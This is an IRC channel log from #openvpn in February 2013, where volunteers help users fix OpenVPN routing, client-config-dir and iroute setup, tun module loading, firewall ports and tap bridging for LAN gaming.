15:34 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
15:35 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
15:36 < WITRchris> right
15:36 < WITRchris> it appears to be failing to add the routes because it's trying to add the routes before the IP of the tunnel int is set up
15:37 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 272 seconds]
15:39 < pekster> WITRchris: This is on the openvpn server? Can you pastebin the logs?
15:39 < WITRchris> sure, sec
15:40 < WITRchris> http://pastebin.ca/2317645
15:42 < WITRchris> once stuff settles,
15:42 < pekster> Yea, I noticed weirdness with that page as it fails to load over IPv6, but works on my IPv4-only AWS proxy via openvpn
15:42 < WITRchris> http://pastebin.ca/2317647
15:43 < WITRchris> that's the netstat -r
15:44 < pekster> Can you also put your config up? OpenVPN is complaining it can't add the route due to a missing gateway, so you likely need to add that for the server and possibly push it to clients too
15:48 < WITRchris> yeah sec
15:49 < WITRchris> http://pastebin.ca/2317653 there's the config
15:52 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has quit [Quit: Leaving]
15:52 < pekster> That's missing all the important bits like the network range and pushed options for clients
15:53 < WITRchris> hm
15:53 < pekster> That won't work as a server config file unless you're passing all the required options on the command-line
15:53 < WITRchris> wut
15:53 < WITRchris> it's... working now i think
15:53 < WITRchris> hang on
15:54 < WITRchris> assuming i didn't screw up
15:55 < WITRchris> it's working fine for the simple multiple clients -> one server config i have
15:57 < kisom> pekster: Did you give my config a go yet?
:)
15:59 < pekster> WITRchris: That is not the full configuration that was called to generate the log output you linked. For instance, the pool setup on line 22 of the log output has no corresponding ifconfig-pool or server directive to support it
16:00 < WITRchris> weird
16:00 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
16:00 < WITRchris> maybe i missed something
16:01 < pekster> How are you starting openvpn? If it's not via 'openvpn --config /usr/local/etc/openvpn.conf' or such, my guess is whatever init system you're using is adding the options. Assuming it even uses that config file to begin with, it'll have to append its own to work as a multi-client server
16:04 < WITRchris> oh i screwed up when i copypasted
16:04 < WITRchris> http://i.ccmo.me/openvpn.conf there
16:05 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 276 seconds]
16:05 < pekster> That's better. You don't need the route or push route for the 10.28.128.0/24 network as the server config option already handles that for you
16:06 < WITRchris> ok
16:07 < WITRchris> apparently i still need some gateway or something for 10.1.10.0 (the pfsense internal net)
16:07 < pekster> Is 10.1.10/24 behind a client then? And you have a matching ccd for it?
16:08 < WITRchris> yes
16:08 < WITRchris> the ccd is set for the client it's behind
16:08 < pekster> Should be 'iroute 10.1.10.0 255.255.255.0' in there
16:08 < WITRchris> yep
16:10 < pekster> The route belongs in the ccd too then
16:10 < WITRchris> so i have to add route 10.1.10.0 255.255.255.0 to that client's ccd?
16:11 < WITRchris> even though other clients are gonna have to be able to connect to it?
16:11 < pekster> Right, and remove that from the main config (but leave the push in there as your other clients need it)
16:12 < WITRchris> ok
16:12 < pekster> That causes the route to 10.1.10/24 to be dynamically added when the client connects, and the iroute tells openvpn to handle it internally via the VPN IP that client is assigned
16:12 < WITRchris> ah ok got it
16:13 < WITRchris> hm
16:13 < pekster> I suppose technically you can do it in the main config (so the route is there even if the client isn't connected) but that's sorta pointless, except maybe to avoid hitting the TTL as it bounces between the VPN server and an upstream gw that routes back to it. You'd need a 'route-gateway' statement though, since --server doesn't include one in subnet mode (see --server in the manpage for the expansion with subnet)
16:13 < WITRchris> i am getting Wed Feb 27 17:14:44 2013 pfsense.vmnet.roc0.chriscmolik.com/66.66.23.158:18633 OPTIONS IMPORT: reading client specific options from: ccd/pfsense.vmnet.roc0.chriscmolik.com
16:13 < WITRchris> Wed Feb 27 17:14:44 2013 pfsense.vmnet.roc0.chriscmolik.com/66.66.23.158:18633 Options error: option 'route' cannot be used in this context
16:15 < pekster> Oh, maybe you can't do that?
I was pretty sure you used to be able to, but maybe I'm remembering that wrong (or I did that in a client-connect script)
16:15 < pekster> So, add 'route-gateway 10.28.128.1' to your server config and see if the route statement works out of the main config
16:16 < pekster> topology subnet doesn't give that to you automatically, for some reason
16:16 < WITRchris> ok
16:18 < WITRchris> ok looks good, clients are getting routes
16:18 -!- Orbi [~opera@109.129.8.111] has left #openvpn []
16:18 < pekster> And your errors about the missing gw should be gone from the server log now
16:18 < WITRchris> and the server is picking up the 10.1.10.0 route
16:19 < WITRchris> yep
16:19 < WITRchris> just gotta get pfsense to actually route the traffic back
16:19 < pekster> So should that duplicate route if you removed the unnecessary route to the subnet's own network
16:19 < WITRchris> yeah i removed the unnecessary route
16:19 < pekster> That should take care of all the errors in the server then
16:20 < WITRchris> yep
16:20 < pekster> You also can remove the ifconfig-pool-persist option as it doesn't really serve a purpose and in rare conditions it's been known to cause issues (when something gets stuck in there that shouldn't, for whatever reason.)
16:21 < pekster> If you actually need static IPs, you're better off issuing them yourself in a ccd or client-connect script outside of the pool range
16:21 -!- EvilJStoker is now known as JStoker
16:23 < WITRchris> mhm
16:24 < WITRchris> aww yeah it worked after i added the int in pfsense and the gateway to 10.28.128.1
16:26 < WITRchris> i'm sure there's a way to push a client a dns server, right?
16:28 < pekster> See the --dhcp-option directive, although non-Windows requires client-side scripts to support it as it's only exposed as an environmental variable on Unix/Linux systems
16:28 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:29 < pekster> Windows passes it to the client during auto-config via the fake DHCP service openvpn exposes to the client
16:29 -!- roboman2444 [~roboman24@unaffiliated/roboman2444] has joined #openvpn
16:29 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn
16:29 < roboman2444> can i get openvpn to work without that annoying taskbar icon?
16:30 < roboman2444> on windows
16:30 < pekster> roboman2444: Under Windows? You can run it as a system service or directly from a command-line or system call from whatever frontend you want
16:30 < roboman2444> and that wont show the taskbar icon up?
16:30 < roboman2444> with programs today, i have like 40 taskbar icons
16:30 < roboman2444> i dont need another
16:30 < pekster> The icon is just the GUI frontend for openvpn
16:31 < roboman2444> ok
16:31 < WITRchris> yep
16:31 < pekster> You're free to start it another way, but the included OpenVPN GUI is controlled/managed solely through the taskbar icon
16:31 < WITRchris> got the dns server
16:31 < WITRchris> i should label a search domain too lol
16:45 -!- roboman2444 [~roboman24@unaffiliated/roboman2444] has quit [Ping timeout: 272 seconds]
16:47 -!- hotwings [hd@secksy.net] has left #openvpn []
17:03 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
17:06 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
17:09 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn
17:09 < pekster> kisom: No, but I should play with it and see if I can reproduce your results.
I'll set a reminder for tonight after I pick up my car and see if I can give it a whirl: I'll drop any notes in the bugreport and ping you too
17:14 -!- WITRchris [~chris@unaffiliated/hyperactivecrond] has left #openvpn []
17:18 * rob0 wants to watch pekster pick up a car!
17:18 < rob0> better yet: to pick it up and whirl it! Wow!
17:19 < pekster> Just let me rig it to a few carabiners and pulleys first :)
17:19 < rob0> cheater :(
17:22 < pekster> cd openvpn; ./configure --with-car-stunts
17:32 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
17:33 -!- ploo [~lbz@c-71-196-252-82.hsd1.co.comcast.net] has joined #openvpn
17:33 < ploo> do people use ask-pass?
17:47 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
17:47 -!- mode/#openvpn [+o krzee] by ChanServ
18:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
18:28 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 252 seconds]
18:34 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
18:39 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 276 seconds]
18:56 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 272 seconds]
19:02 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn
19:03 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
19:11 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
19:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
19:17 -!- JStoker is now known as Guest64683
19:19 -!- Guest64683 [jstoker@unaffiliated/jstoker] has left #openvpn []
19:19 -!- JStoker2 [jstoker@unaffiliated/jstoker] has joined #openvpn
19:19 -!- JStoker2 is now known as EvilJStoker
19:29 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
19:30 -!- raidz is now known as raidz_away
19:44 < greyeax> is there any other way to have openvpn authenticate against openldap other than openvpn-auth-ldap plugin? because it apparently does not want to build on my machine.
19:52 <@krzee> sure, any script you write will work
19:52 <@krzee> (if your script works)
19:52 <@krzee> !script
19:52 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn
19:52 <@krzee> !authpass
19:52 <@vpnHelper> "authpass" is (#1) please see --auth-user-pass-verify in the manual to learn how to force clients to use passwords in addition to certs or (#2) or to ONLY use passwords (no certs, highly NOT recommended) also use --client-cert-not-required or (#3) and if you want the login name to be used as the common-name for things like ccd entries, use --username-as-common-name
19:58 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has left #openvpn []
20:07 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn
20:12 -!- Aprogas [aprogas@enki.aprogas.net] has joined #openvpn
20:12 < Aprogas> !welcome
20:12 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
20:12 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
20:13 < Aprogas> !topology
20:13 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets.
or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this.
20:14 < Aprogas> !/30
20:14 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf
20:26 < Aprogas> !interface
20:26 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when being connected. Be sure to also add the routing tables for both situations from client and from server or (#2) in windows: ipconfig /all - unix: ifconfig -a , and for routing tables: netstat -rn
20:30 -!- p3rror [~mezgani@41.140.38.124] has quit [Ping timeout: 248 seconds]
20:33 -!- brute11k [~brute@89.249.230.53] has joined #openvpn
20:51 -!- MeanderingCode_ [~Meanderin@71-213-181-244.albq.qwest.net] has quit [Read error: Operation timed out]
20:51 -!- devslash [~devslash@unaffiliated/devslash] has joined #openvpn
20:51 < devslash> i installed openvpn on my linux server
20:51 < devslash> i want to connect from android. which files do i need to copy to the client ?
20:53 < devslash> is anyone here ?
21:00 -!- pinion [~pinion@unaffiliated/pinion] has joined #openvpn
21:01 < pinion> !welcome
21:01 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server.
|| Also interesting: !man !/30 !topology !iporder !sample !forum
21:01 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
21:07 < pekster> devslash: did you see:
21:07 < pekster> !howto
21:07 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
21:07 < devslash> yea
21:08 < devslash> thanks
21:09 < pinion> I would like to access an internal webhost from my iphone. I barely know what I'm doing but I got openvpn configured and running on openwrt and I'm able to connect from my iphone on LTE. The issue is I can only get to certain hosts eg 192.168.2.69:8081 or 8082 but I can't get to 192.168.2.69:80
21:09 < pekster> Besides the client-centric config, the client needs the ca.crt from the PKI you created (assuming you're using TLS mode, which is recommended) and its own keypair (so the key and cert the PKI generated from the public key)
21:09 < pinion> Server cfg: http://pastebin.com/qznjH9bp
21:11 < pinion> And apparently the log was set to go to a location that doesn't exist...
21:12 < pekster> pinion: On OpenWRT you probably either want to let it log to syslog (ie: the circular buffer OpenWRT keeps in RAM) or on a mounted USB partition, otherwise you're going to be doing a lot of write to the internal flash and growing the log since you used -append
21:13 < pekster> I see you're redirecting the gateway too, which should be sufficient to reach an internal LAN; you need a return route so the LAN client can get back to the VPN network. Is the VPN server also the LAN's default gateway?
(that would take care of the return route)
21:14 < pekster> Also, I need to give you some bonus points for posting a real config and not the OpenWRT UCI mess ;)
21:14 < pinion> Thanks :), give me a minute to chew on this
21:15 < pinion> the vpn server isn't the lans default gateway, no
21:15 < pekster> In that case your LAN's gw needs a return route that sends traffic bound for the VPN client network range via the VPN server
21:16 < pekster> (otherwise the return traffic gets routed upstream in a typical home network setup where that gw has its own default route)
21:17 < pinion> Cool I'll check that out, the log is going to an external usb drive.. but I still don't really want it doing that I don't think. thanks for the syslog tip
21:17 < pinion> and I'll google around on openwrt about the default gateway
21:19 < pekster> It's fine if your VPN server (whatever it is running on) isn't the default gw for LAN clients, but then the gw that is needs a return route. See:
21:19 < pekster> !serverlan
21:19 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
21:20 < devslash> when i try to do openvpn /etc/openvpn/server.conf i get an error "ERROR: Cannot open TUN/TAP dev /dev/net/tun: No such device (errno=19)"
21:20 < devslash> I loaded the tun module
21:20 < devslash> and /dev/net/tun does exist
21:21 < pekster> Not running as root perhaps, lacking permission to read it?
21:21 < devslash> i am root
21:22 < devslash> i do have a firewall
21:22 < devslash> shorewall. do I need to allow access to it ?
21:23 < devslash> hmm
21:23 < devslash> i don't think the tun module loaded.
i don't see it in the output of lsmod
21:25 < pekster> if it's a module you should; if it's built into the kernel you won't see it there
21:26 < pekster> If you have config.gz support, this will tell you: zgrep CONFIG_TUN /proc/config.gz
21:26 < devslash> i think i need to load the module
21:26 < devslash> its set as a module
21:26 < devslash> ONFIG_TUN=m
21:26 < devslash> err CONFIG_TUN=m
21:26 < pekster> 'modprobe tun' then
21:27 < devslash> i did
21:27 < devslash> no error
21:27 < devslash> but if I do lsmod it doesn't appear to have loaded
21:27 <@ecrist> evening, kids
21:28 < devslash> any idea ?
21:29 < pekster> modprobe shouldn't exit cleanly if it failed to load the module. Try insmod instead?
21:29 < pinion> pekster: My hero. I just had to set up the firewall zone settings, add a new zone (eg VPN), and do some "inter-zone forwarding"
21:29 < pinion> Appears to be working great now, thanks for the help
21:29 < devslash> just insmod tun ?
21:30 < pekster> I think it needs a full path to the module, but it's been a while since I've used it
21:32 < pekster> Yea, looks like my insmod eats it like that; check for the .ko module file at /lib/modules/`uname -r`/kernel/drivers/net/tun.ko
21:33 < pekster> modprobe "shouldn't" give you a zero exit-code if it failed; it'll return success silently though if the module is loaded (and you should thus see it with: lsmod | grep tun)
21:50 -!- devslash [~devslash@unaffiliated/devslash] has quit [Quit: devslash]
21:51 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
21:58 -!- brute11k [~brute@89.249.230.53] has quit [Quit: Leaving.]
22:04 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has quit [Ping timeout: 245 seconds]
22:05 -!- MorgyN [~mig@island.morgyn.org] has quit [Ping timeout: 255 seconds]
22:05 -!- mcp [~mcp@wolk-project.de] has quit [Ping timeout: 264 seconds]
22:05 -!- pcdummy [~quassel@unaffiliated/pcdummy] has quit [Ping timeout: 245 seconds]
22:11 -!- pcdummy [~quassel@mx1.page4me.ch] has joined #openvpn
22:11 -!- pcdummy [~quassel@mx1.page4me.ch] has quit [Changing host]
22:11 -!- pcdummy [~quassel@unaffiliated/pcdummy] has joined #openvpn
22:17 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn
22:18 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has joined #openvpn
22:19 -!- devslash [~devslash@unaffiliated/devslash] has joined #openvpn
22:20 -!- mcp [~mcp@wolk-project.de] has joined #openvpn
22:43 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has left #openvpn []
22:45 < devslash> i just set up openvpn in arch linux and Im using shorewall. Do i need to open a port in shorewall?
22:48 < pekster> That depends greatly on your firewall setup. The encapsulated OpenVPN traffic operates over a single port, UDP port 1194 by default and IANA standard
22:56 -!- devslash [~devslash@unaffiliated/devslash] has quit [Quit: devslash]
23:04 -!- devslash [~devslash@unaffiliated/devslash] has joined #openvpn
23:13 -!- n2deep [n2deep@odin.sdf-eu.org] has quit [Ping timeout: 252 seconds]
23:16 < devslash> i configured openvpn on my linux server, copied the necessary files to my client (android device running openvpn client). when i connect within my pan it appears to connect correctly.
when i connect from my client it says no route to host
23:26 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 260 seconds]
23:27 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn
23:33 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn
23:53 -!- Visitorer [~Visitorer@unaffiliated/visitorer] has joined #openvpn
23:53 < Visitorer> user@domain:~/conf/OpenVPN/examples/easy-rsa$ ./build-ca
23:53 < Visitorer> ./build-ca: line 8: ~/conf/OpenVPN/examples/easy-rsa/pkitool: No such file or directory
23:53 < Visitorer> but pkitool is there
23:58 -!- devslash [~devslash@unaffiliated/devslash] has quit [Quit: devslash]
--- Day changed Thu Feb 28 2013
00:12 < Visitorer> Jesus Christ, nothing's ever working right
00:17 < Visitorer> bleh, nvm, gave up on trying to change the directories..
00:37 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
00:38 -!- mode/#openvpn [+o krzee] by ChanServ
00:46 -!- feth [~feth@ile-flottante.tuttu.info] has quit [Ping timeout: 255 seconds]
00:46 -!- feth [foobar@ile-flottante.tuttu.info] has joined #openvpn
00:55 -!- TriJetScud [~TriJetScu@2001:470:e97f:1003:215:5dff:fe07:4806] has joined #openvpn
00:55 < TriJetScud> #tunortap
00:55 < TriJetScud> !tunortap
00:55 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against
00:55 <@vpnHelper> you over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
01:24 < Visitorer> so I want to set this up on my VPS for LAN gaming
01:25 < Visitorer> but I have no idea how to configure bridge-start
01:25 < Visitorer> if I do ifconfig, I have no eth0 device
01:27 < Visitorer> hm.. nvm... apparently I can't
01:27 < Visitorer> oh well
01:27 -!- Visitorer [~Visitorer@unaffiliated/visitorer] has left #openvpn ["8V"]
01:36 -!- EvilJStoker is now known as JStoker
01:38 -!- local [~local@HSI-KBW-095-208-244-144.hsi5.kabel-badenwuerttemberg.de] has joined #openvpn
01:39 -!- RichardBronosky [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has quit [Ping timeout: 255 seconds]
01:40 < local> hello everybody. I am referring to the official HowTo (http://openvpn.net/index.php/open-source/documentation/howto.html#scope) at the topic "Including multiple machines on the client side when using routed vpn (dev tun)":
01:40 <@vpnHelper> Title: HOWTO (at openvpn.net)
01:41 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Ping timeout: 255 seconds]
01:41 < local> Is there a way so I do NOT HAVE to use the client-config-dir line in server.conf? Can I somehow manually assign the iroute for just a single client VPN network which should connect to the server?
01:41 -!- RichardBronosky [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has joined #openvpn
01:41 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn
01:46 -!- local [~local@HSI-KBW-095-208-244-144.hsi5.kabel-badenwuerttemberg.de] has left #openvpn []
01:50 -!- sh_t [~sht@176.222.238.158] has quit [Ping timeout: 276 seconds]
01:54 -!- sh_t [~sht@176.222.238.158] has joined #openvpn
01:58 < EugeneKay> Nope.
02:08 -!- dazo_afk is now known as dazo
02:18 -!- Visitorer [~Visitorer@unaffiliated/visitorer] has joined #openvpn
02:19 < Visitorer> isn't there a way to install OpenVPN without Tunnelblick or any GUI?
02:19 < Visitorer> on Mac
02:19 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
02:20 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit]
02:26 -!- devslash [~devslash@unaffiliated/devslash] has joined #openvpn
02:26 -!- devslash [~devslash@unaffiliated/devslash] has quit [Client Quit]
02:40 -!- mattock_afk is now known as mattock
02:43 <@krzee> Visitorer, sure
02:43 <@krzee> !osxtun
02:43 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 276 seconds]
02:43 <@krzee> !osxtuntap
02:44 <@krzee> !factoids search osx
02:44 <@vpnHelper> 'osxipforward', 'osxboot', and 'osx'
02:44 <@krzee> well you'll need tuntap drivers installed separately
02:44 <@krzee> or you can pull the kext from tunnelblick
02:46 < Visitorer> actually, I want to avoid using tunnelblick's drivers, if I am to believe what this guy wrote here : http://blog.remibergsma.com/2012/08/03/openvpn-on-mountain-lion-tunnelblick-alternative-viscosity-to-the-rescue/ they are problematic on Mountain Lion
02:46 < Visitorer> I don't have Mountain Lion myself but the person who I want to connect with does and I want to avoid trouble for them
02:47 <@krzee> ive used it on 10.8 on someones machine and i believe ecrist uses it there
02:50 < Visitorer> hm.. I'll have him give it a try then
03:16 -!- zz_AsadH is now known as AsadH
03:31 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn
03:40 <@krzee> !blame
03:40 <@vpnHelper> "blame" is (#1) According to Bushmills, it's always krzee's fault or (#2) According to krzee, it's always dazo's fault or (#3) and dazo will always blame EugeneKay, Bushmills, ecrist or any other sensible victims in the required moments
03:41 <@krzee> !learn blame as cron2 says its always d12fk's fault (and sometimes the customers)
03:41 <@vpnHelper> Joo got it.
03:42 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 272 seconds]
03:45 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection]
03:47 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
04:01 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Max SendQ exceeded]
04:02 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
04:02 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn
04:03 -!- krzie [nobody@openvpn/community/support/krzee] has joined #openvpn
04:03 -!- mode/#openvpn [+o krzie] by ChanServ
04:03 -!- krzie [nobody@openvpn/community/support/krzee] has left #openvpn ["Leaving"]
04:03 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
04:04 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
04:04 -!- mode/#openvpn [+o krzee] by ChanServ
04:06 -!- greyeax [~grey@cpe-108-185-215-179.socal.res.rr.com] has quit [Read error: Connection reset by peer]
04:07 -!- greyeax [~grey@cpe-108-185-215-179.socal.res.rr.com] has joined #openvpn
04:07 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Ping timeout: 252 seconds]
04:13 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
04:21 -!- sqwerty [~sqwerty@rubberductions.plus.com] has joined #openvpn
04:21 -!- sqwerty [~sqwerty@rubberductions.plus.com] has quit [Changing host]
04:21 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn
04:50 -!- catsup [~d@64.111.123.163] has joined #openvpn
05:09 -!- brute11k [~brute@89.249.230.53] has joined #openvpn
05:28 -!- joshie [~josh@75-150-76-129-NewEngland.hfc.comcastbusiness.net] has quit [Quit: No Ping reply in 180 seconds.]
05:29 -!- joshie [~josh@joshie.net] has joined #openvpn
06:27 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn
06:29 -!- wykydtro- [tassadar@persephone.darkness-reigns.net] has joined #openvpn
06:31 -!- kloeri_ [~kloeri@freenode/staff/exherbo.kloeri] has joined #openvpn
06:31 -!- feth_ [foobar@ile-flottante.tuttu.info] has joined #openvpn
06:31 -!- cyberspace- [20253@ninthfloor.org] has quit [Disconnected by services]
06:31 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
06:33 -!- raidzz [~raidz@raidz.im] has joined #openvpn
06:33 -!- raidzz is now known as raidz
06:33 -!- raidz [~raidz@raidz.im] has quit [Changing host]
06:33 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn
06:33 -!- mode/#openvpn [+o raidz] by ChanServ
06:35 -!- Netsplit *.net <-> *.split quits: kloeri, @raidz_away, feth, wykydtron, JPeterson, paccer
06:39 -!- p3rror [~mezgani@41.249.14.4] has joined #openvpn
06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds]
06:49 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn
06:52 -!- kloeri_ is now known as kloeri
06:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
06:55 < Visitorer> okay so I've set up a server on a tap interface
06:55 < Visitorer> on Mac OS
06:55 < Visitorer> my friend and I can both see each other's iTunes libraries
06:55 < Visitorer> so we're somehow connected
06:55 < Visitorer> however, we can't see each other on Civilization V
06:56 < Visitorer> I'm thinking that it may have something to do with the priority of the network interface if there is such a thing on Mac
06:56 < Visitorer> or that Civ V can't broadcast to the LAN
06:56 < Visitorer> for some reason
06:56 < Visitorer> I followed the config here, which apparently works http://forums.civfanatics.com/showthread.php?t=482925
06:57 < Visitorer> except that I have server-bridge 192.168.50.4 255.255.255.0 192.168.50.50 192.168.50.100 instead
07:01 < neilhwatson> Can each of you ping the other's computer?
07:26 < Visitorer> actually, no
07:28 -!- feth_ is now known as feth
07:30 -!- ade_b [Ade@nat/redhat/x-ivcbwnduhfydwbdr] has joined #openvpn
07:30 -!- ade_b [Ade@nat/redhat/x-ivcbwnduhfydwbdr] has quit [Changing host]
07:30 -!- ade_b [Ade@redhat/adeb] has joined #openvpn
07:34 < neilhwatson> Then your tunnel might not be functioning, or you have a firewall issue.
07:42 -!- simpelsimon [~smalessa@91-66-249-214-dynip.superkabel.de] has joined #openvpn
07:43 < simpelsimon> hey, im trying to setup openvpn on ubuntu12.10
07:44 < simpelsimon> everything works until /sbin/ifconfig tun14 10.1.0.38 pointotpoint 10.1.0.37 mt 1500
07:44 < simpelsimon> openvpn is blocking
07:44 < simpelsimon> any idea?
07:53 < Visitorer> well I know that my router isn't the problem, as I had originally forgotten to forward the port so my friend couldn't even connect originally
07:54 < Visitorer> the firewall on my computer is turned off...
07:54 < Visitorer> I don't understand why we can share iTunes libraries then..?
08:02 -!- alex88 [~alex88@unaffiliated/alex88] has left #openvpn ["Leaving..."]
08:14 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
08:31 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds]
08:37 -!- paccer [uid4847@gateway/web/irccloud.com/x-alqdhrhtspqzjhoz] has joined #openvpn
08:44 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
08:50 -!- dazo is now known as dazo_afk
09:05 -!- dazo_afk is now known as dazo
09:22 -!- Visitorer [~Visitorer@unaffiliated/visitorer] has quit [Quit: Client has a boner *rimshot* Get it?]
09:26 -!- Matir [~matir@ubuntu/member/matir] has quit [Ping timeout: 248 seconds]
09:26 -!- Matir [~matir@ubuntu/member/matir] has joined #openvpn
09:37 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
09:46 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
10:05 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Ping timeout: 246 seconds]
10:05 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn
10:08 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
